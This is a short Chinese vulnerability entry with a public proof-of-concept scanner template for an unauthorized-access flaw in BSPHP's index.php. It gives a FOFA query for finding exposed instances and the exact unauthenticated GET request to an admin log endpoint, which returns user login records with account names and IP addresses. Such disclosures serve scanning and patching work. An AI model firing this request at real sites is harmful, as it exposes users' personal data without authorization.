漏洞描述
BSPHP 存在未授权访问 泄露用户IP和账户名信息
fofa-query: "BSPHP"
bsphp-nauthorized-access: BSPHP index.php 未授权访问信息泄露漏洞
PoC代码[已公开]
id: bsphp-nauthorized-access
info:
name: BSPHP index.php 未授权访问信息泄露漏洞
author: daffainfo
severity: medium
verified: true
description: |
BSPHP 存在未授权访问 泄露用户IP和账户名信息
fofa-query: "BSPHP"
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/BSPHP%20index.php%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
rules:
r0:
request:
method: GET
path: /admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0‘
expression: response.status == 200 && response.body.bcontains(b'"user":') && response.body.bcontains(b'"ip":')
expression: r0()